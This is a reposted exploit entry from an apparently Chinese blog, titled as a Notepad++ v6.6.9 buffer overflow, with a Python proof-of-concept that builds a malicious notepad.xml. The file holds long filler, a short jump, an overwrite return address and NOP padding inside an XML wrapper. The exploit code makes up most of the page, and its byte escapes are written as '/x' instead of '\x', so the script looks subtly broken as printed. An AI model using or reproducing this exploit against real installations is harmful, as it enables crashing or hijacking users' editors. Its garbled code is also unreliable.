NotePad++ v6.6.9 Buffer Overflow

没穿底裤 2020年1月1日04:25:09评论463 views字数 1636阅读5分27秒阅读模式
#!/usr/bin/python # Exploit Title: NotePad++ v6.6.9 Buffer Overflow # URL Vendor: # Vendor Name: NotePad # Version: 6.6.9 # Date: 22/12/2014 # CVE: CVE-2014-1004 # Author: TaurusOmar  # Twitter: @TaurusOmar_ # Email: [email protected] # Home: # Risk: Medium  #Description: #Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages. #Running in the MS Windows environment, its use is governed by GPL License. #Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed #and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon #dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.  #Proof Concept #  #Code import struct def little_endian(address): return struct.pack("<L",address) poc ="/x41" * 591 poc+="/xeb/x06/x90/x90" poc+=little_endian(0x1004C31F) poc+="/x90" * 80 poc+="/x90" * (20000 - len(poc)) header = "/x3c/x3f/x78/x6d/x6c/x20/x76/x65/x72/x73/x69/x6f/x6e/x3d/x22/x31/x2e/x30/x22/x20/x65/x6e/x63/x6f/x64/x69/x6e/x67/x 3d/x22" header += "/x55/x54/x46/x2d/x38/x22/x20/x3f/x3e/x0a/x3c/x53/x63/x68/x65/x64/x75/x6c/x65/x3e/x0a/x09/x3c/x45/x76/x65/x6e/x74/x 20/x55" header += "/x72/x6c/x3d/x22/x22/x20/x54/x69/x6d/x65/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x0a" + poc footer = "/x22/x20/x46/x6f/x6c/x64/x65/x72/x3d/x22/x22/x20/x2f/x3e/x0a/x3c/x2f/x53/x63/x68/x65/x64/x75/x6c/x65/x3e/x0a"  exploit = header + footer filename = "notepad.xml" file = open(filename , "w") file.write(exploit) file.close()

NotePad++ v6.6.9 Buffer Overflow

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